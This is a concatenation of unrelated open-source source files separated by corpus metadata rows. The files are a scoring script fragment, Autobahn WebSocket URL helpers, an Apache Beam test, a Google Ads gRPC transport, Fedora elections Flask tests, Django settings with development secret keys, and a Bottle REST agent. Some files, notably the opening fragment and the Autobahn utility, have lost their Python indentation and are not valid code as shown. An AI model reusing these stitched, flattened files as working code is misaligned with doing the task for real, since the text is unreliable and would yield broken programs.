completo = completos / ficha.Variables.Count
det = proc.CrearDetalle(res, "calidad", "num_completos", None)
det.Valor_numerico = completo
res.AddDetalle(det)
res.Completo = completo
		# calculation
totales = {}
for (k,v) in data.iteritems():
if v == None: continue
var = ficha.Variables[k]
pond = match_valor(var, v, data)
if not pond: continue
i = 0
for ame in ficha.Temas:
num = pond[i]
po = var.Ponderaciones[i]
i+=1
if num == None or po == None: continue
calc = num * po
det = proc.CrearDetalle(res, ame, k, cadena(v))
det.Valor_numerico = num
det.Calculado = calc
res.AddDetalle(det)
if i not in totales: totales[i] = 0
totales[i] += calc
for (ind, tot) in totales.iteritems():
setattr(res, "Indicador%s" % ind, tot)
resultados.Add(res)
total+=1
if total % 10 == 0:
print "Calculados %s" % total
print "Procesado"
correr()
| mit | 8,565,035,509,269,657,000 | 24.867257 | 64 | 0.656175 | false |
meejah/AutobahnPython | autobahn/websocket/util.py | 1 | 5373 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
from six.moves import urllib
# The Python urlparse module currently does not contain the ws/wss
# schemes, so we add those dynamically (which is a hack of course).
# Since the urllib from six.moves does not seem to expose the stuff
# we monkey patch here, we do it manually.
#
# Important: if you change this stuff (you shouldn't), make sure
# _all_ our unit tests for WS URLs succeed
#
if not six.PY3:
# Python 2
import urlparse
else:
# Python 3
from urllib import parse as urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
__all__ = (
"create_url",
"parse_url",
)
def create_url(hostname, port=None, isSecure=False, path=None, params=None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default
ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be
properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query
component of the addressed resource (will be properly URL
escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.parse.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.parse.urlencode(params)
else:
query = None
return urllib.parse.urlunparse((scheme, netloc, ppath, None, query, None))
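# Examples of the URL construction above (illustrative; host/port are placeholders):
#   create_url("localhost", port=9000, params={"foo": "bar"})
#   -> "ws://localhost:9000/?foo=bar"
#   create_url("example.com", isSecure=True)
#   -> "wss://example.com:443/"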
def parse_url(url):
"""
    Parses a WebSocket URL into its components and returns a tuple (isSecure, host, port, resource, path, params).
- ``isSecure`` is a flag which is True for wss URLs.
- ``host`` is the hostname or IP from the URL.
- ``port`` is the port from the URL or standard port derived from
scheme (ws = 80, wss = 443).
- ``resource`` is the /resource name/ from the URL, the /path/
together with the (optional) /query/ component.
- ``path`` is the /path/ component properly unescaped.
- ``params`` is the /query/ component properly unescaped and
returned as dictionary.
:param url: A valid WebSocket URL, i.e. ``ws://localhost:9000/myresource?param1=23¶m2=456``
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if not parsed.hostname or parsed.hostname == "":
raise Exception("invalid WebSocket URL: missing hostname")
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket URL: bogus protocol scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.parse.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return parsed.scheme == "wss", parsed.hostname, port, resource, path, params
| mit | 3,172,701,543,002,705,000 | 34.582781 | 116 | 0.647869 | false |
iemejia/incubator-beam | sdks/python/apache_beam/dataframe/convert_test.py | 1 | 2180 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import unittest
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe import convert
from apache_beam.testing.util import assert_that
class ConvertTest(unittest.TestCase):
def test_convert(self):
def equal_to_unordered_series(expected):
def check(actual):
actual = pd.concat(actual)
if sorted(expected) != sorted(actual):
raise AssertionError(
'Series not equal: \n%s\n%s\n' % (expected, actual))
return check
with beam.Pipeline() as p:
a = pd.Series([1, 2, 3])
b = pd.Series([100, 200, 300])
pc_a = p | 'A' >> beam.Create([a])
pc_b = p | 'B' >> beam.Create([b])
df_a = convert.to_dataframe(pc_a, proxy=a[:0])
df_b = convert.to_dataframe(pc_b, proxy=b[:0])
df_2a = 2 * df_a
df_3a = 3 * df_a
df_ab = df_a * df_b
# Converting multiple results at a time can be more efficient.
pc_2a, pc_ab = convert.to_pcollection(df_2a, df_ab)
# But separate conversions can be done as well.
pc_3a = convert.to_pcollection(df_3a)
assert_that(pc_2a, equal_to_unordered_series(2 * a), label='Check2a')
assert_that(pc_3a, equal_to_unordered_series(3 * a), label='Check3a')
assert_that(pc_ab, equal_to_unordered_series(a * b), label='Checkab')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,303,798,384,914,836,000 | 33.0625 | 75 | 0.672018 | false |
googleads/google-ads-python | google/ads/googleads/v7/services/services/customer_client_service/transports/grpc.py | 1 | 10383 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import customer_client
from google.ads.googleads.v7.services.types import customer_client_service
from .base import CustomerClientServiceTransport, DEFAULT_CLIENT_INFO
class CustomerClientServiceGrpcTransport(CustomerClientServiceTransport):
"""gRPC backend transport for CustomerClientService.
Service to get clients in a customer's hierarchy.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
            host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_customer_client(
self,
) -> Callable[
[customer_client_service.GetCustomerClientRequest],
customer_client.CustomerClient,
]:
r"""Return a callable for the
get customer client
method over gRPC.
Returns the requested client in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetCustomerClientRequest],
~.CustomerClient]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_customer_client" not in self._stubs:
self._stubs["get_customer_client"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v7.services.CustomerClientService/GetCustomerClient",
request_serializer=customer_client_service.GetCustomerClientRequest.serialize,
response_deserializer=customer_client.CustomerClient.deserialize,
)
return self._stubs["get_customer_client"]
__all__ = ("CustomerClientServiceGrpcTransport",)
| apache-2.0 | 3,458,914,125,503,089,000 | 40.866935 | 94 | 0.605894 | false |
NerdsvilleCEO/elections | tests/test_flask_simple_voting.py | 1 | 9190 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
(c) 2014 - Copyright Pierre-Yves Chibon
Author: Pierre-Yves Chibon <[email protected]>
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2, or (at your option) any later version. This
# program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the GNU
# General Public License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public License and
# may only be used or replicated with the express permission of Red Hat, Inc.
fedora_elections.elections test script
"""
__requires__ = ['SQLAlchemy >= 0.7', 'jinja2 >= 2.4']
import pkg_resources
import logging
import unittest
import sys
import os
from datetime import time
from datetime import timedelta
import flask
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
import fedora_elections
from tests import ModelFlasktests, Modeltests, TODAY, FakeUser, user_set
# pylint: disable=R0904
class FlaskSimpleElectionstests(ModelFlasktests):
""" Flask application tests range voting. """
def test_vote_simple(self):
""" Test the vote_simple function - the preview part. """
output = self.app.get(
'/vote/test_election', follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<title>OpenID transaction in progress</title>' in output.data
or 'discoveryfailure' in output.data)
self.setup_db()
user = FakeUser(['packager'], username='toshio')
with user_set(fedora_elections.APP, user):
output = self.app.get(
'/vote/test_election5', follow_redirects=True)
self.assertTrue(
'class="message">You have already voted in the election!</'
in output.data)
user = FakeUser(['packager'], username='pingou')
with user_set(fedora_elections.APP, user):
output = self.app.get(
'/vote/test_election5')
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
# Invalid vote: No candidate
data = {
'action': 'preview',
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<td class="error">Not a valid choice</td>'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
# Invalid vote: No candidate
data = {
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<td class="error">Not a valid choice</td>'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
# Invalid vote: Not numeric
data = {
'candidate': 'a',
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Valid input
data = {
'candidate': 7,
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="submit" />'
in output.data)
self.assertTrue(
'<li class="message">Please confirm your vote!</li>'
in output.data)
def test_vote_simple_process(self):
""" Test the vote_simple function - the voting part. """
output = self.app.get(
'/vote/test_election', follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<title>OpenID transaction in progress</title>' in output.data
or 'discoveryfailure' in output.data)
self.setup_db()
user = FakeUser(['packager'], username='pingou')
with user_set(fedora_elections.APP, user):
# Invalid candidate id - no csrf
data = {
'candidate': 1,
'action': 'submit',
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
# Invalid candidate id
data = {
'candidate': 1,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Invalid vote: too low
data = {
'candidate': -1,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Invalid vote: Not numeric
data = {
'candidate': 'a',
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Valid input
data = {
'candidate': 8,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'class="message">Your vote has been recorded. Thank you!</'
in output.data)
self.assertTrue('<h3>Current elections</h3>' in output.data)
self.assertTrue('<h3>Next 1 elections</h3>' in output.data)
self.assertTrue('<h3>Last 2 elections</h3>' in output.data)
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(
FlaskSimpleElectionstests)
unittest.TextTestRunner(verbosity=2).run(SUITE)
| gpl-2.0 | 9,100,632,720,071,178,000 | 35.613546 | 79 | 0.54124 | false |
Cesar0510/lbzproject | lbzproject/settings/base.py | 1 | 3224 | """
Django settings for lbzproject project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm*b97e*!6!vb2j-=8t$3mzj$doenpmv**bc07*u39*4#rib(w5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lbzproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(ROOT_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lbzproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# apps #
INSTALLED_APPS += ['apps.principal']
| apache-2.0 | -665,079,409,604,450,000 | 25.211382 | 91 | 0.688275 | false |
manue1/connectivity-manager-agent | cm-agent/wsgi/application.py | 1 | 3443 | # Copyright 2015 Technische Universitaet Berlin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from bottle import Bottle, response, request
from core.agent import Agent as CMAgent
__author__ = 'beb'
"""
# Private error methods
"""
def bad_request(param):
response.body = param
response.status = 400
response.content_type = 'application/json'
return response
def internal_error(message):
response.body = message
response.status = 500
response.content_type = 'application/json'
return response
def not_found(message):
response.body = message
response.status = 404
response.content_type = 'application/json'
return response
def encode_dict_json(data_dict):
data_json = json.dumps(data_dict)
return data_json
"""
# ReST API
"""
class Application:
def __init__(self, host, port):
self._host = host
self._port = port
self._app = Bottle()
self._route()
self._debug = True
self.agent = CMAgent()
def _route(self):
# Welcome Screen
self._app.route('/', method="GET", callback=self._welcome)
# Hypervisor methods
self._app.route('/hosts', method="GET", callback=self._hosts_list)
# QoS methods
self._app.route('/qoses', method=["POST", "OPTIONS"], callback=self._qoses_set)
def start(self):
self._app.run(host=self._host, port=self._port)
def _welcome(self):
response.body = "Welcome to the Connectivity Manager Agent"
response.status = 200
return response
def _hosts_list(self):
"""
List all OpenStack hypervisors with runtime details
"""
agent = CMAgent()
hypervisors = agent.list_hypervisors()
response.body = encode_dict_json(hypervisors)
logging.debug('Hypervisor list response', response.body)
response.status = 200
response.content_type = 'application/json'
return response
def _qoses_set(self):
"""
Set QoS for VMs
"""
qos_json = request.body.getvalue()
logging.debug('QoS JSON is: %s', qos_json)
if not qos_json:
return bad_request('This POST methods requires a valid JSON')
try:
set_qos = self.agent.set_qos(qos_json)
except Exception, exc:
logging.error(exc.message)
return internal_error(exc.message)
response.status = 200
response.body = encode_dict_json(set_qos)
logging.debug('QoS processed: %s', response.body)
return response
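# Summary of the routes wired up by Application._route() above (illustrative note):
#   GET  /       -> _welcome     (plain welcome message)
#   GET  /hosts  -> _hosts_list  (JSON list of hypervisors)
#   POST /qoses  -> _qoses_set   (expects a QoS JSON document in the request body)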
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s_%(process)d:%(lineno)d [%(levelname)s] %(message)s',level=logging.INFO)
server = Application(host='0.0.0.0', port=8091)
print('Connectivity Manager Agent serving on port 8091...')
server.start()
| apache-2.0 | 7,927,272,825,957,574,000 | 26.99187 | 115 | 0.636945 | false |
plagree/TOPKS | test/yelp/TOPZIP/script.py | 1 | 2180 | #!/usr/bin/env python
#-*-coding: utf-8 -*-
import urllib2
import json
import numpy as np
import sys
import cPickle as pickle
TITLE = r'\textbf{Yelp social network}'
N = 100 # Number of queries for averaging
DOMAIN = 'http://localhost:8000/topks'
SUPERNODES = False
MAPPING = dict()
T = 2000
NEW_QUERY = True
N_NEIGH = 40000
THRESHOLD = 0.
def read_test_input(line):
seeker, item, query = line.rstrip().split()
return (int(seeker), int(item), query)
def NDCGrequest(seeker, tag, k=20, alpha=0):
q = tag
url = DOMAIN + \
'?q=' + q + \
'&seeker=' + str(seeker) + \
'&alpha=' + str(alpha) + \
'&k=' + str(k) + \
'&t='+ str(T) + \
'&newQuery=' + str(NEW_QUERY) + \
'&nNeigh=' + str(N_NEIGH)
result = None
try:
response = urllib2.urlopen(url)
data = json.load(response)
if not data.has_key('status'):
return None
if data.get('status') != 1:
return None
results = data['results']
for res in results:
if res['id'] == 35397:
result = res['rank']
except urllib2.HTTPError, error:
print error.read()
except (ValueError, KeyError, TypeError) as error:
print error
return result
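# Illustrative example of the request URL built above (the seeker id and tag are
# hypothetical placeholders):
#   NDCGrequest(42, 'sushi', k=20, alpha=0) queries
#   http://localhost:8000/topks?q=sushi&seeker=42&alpha=0&k=20&t=2000&newQuery=True&nNeigh=40000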
def main(input_tests):
results = dict()
PREF_MIN = 2
PREF_MAX = 6
ALPHA = 0.
with open('output.txt', 'a') as f2:
with open(input_tests, 'r') as f:
i = 0
for line in f:
if i >= N:
break
seeker, query, tag = read_test_input(line)
#if len(tag) < 6:
# continue
i += 1
print i
for l in range(PREF_MIN, PREF_MAX+1):
result = NDCGrequest(seeker, tag[:l], k=1000, alpha=ALPHA)
f2.write('%d\t%d\t%s\t%d\t%d\t%d\t%f\t%f\t%d\t%d\t%d\t%d\n'
% (seeker, query, tag, -1, T, l, ALPHA,
THRESHOLD, result, 1, 3, 10))
if __name__ == '__main__':
input_tests = sys.argv[1]
main(input_tests)
| gpl-3.0 | 8,087,897,326,729,252,000 | 27.311688 | 79 | 0.490826 | false |
CCrypto/ccvpn3 | ccvpn/settings.py | 1 | 7026 | """
Django settings for ccvpn project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.validators import RegexValidator
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@4+zlzju0(wymvatr%8uguuc-aeap8yaz$269ftloqhd&vm%c4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_countries',
'lambdainst',
'payments',
'tickets',
'constance',
'constance.backends.database',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.middleware.locale.LocaleMiddleware',
'lambdainst.middleware.ReferrerMiddleware',
'lambdainst.middleware.CampaignMiddleware',
)
ROOT_URLCONF = 'ccvpn.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.i18n',
'django.template.context_processors.static',
'django.template.context_processors.csrf',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'ccvpn.context_processors.some_settings',
],
},
},
]
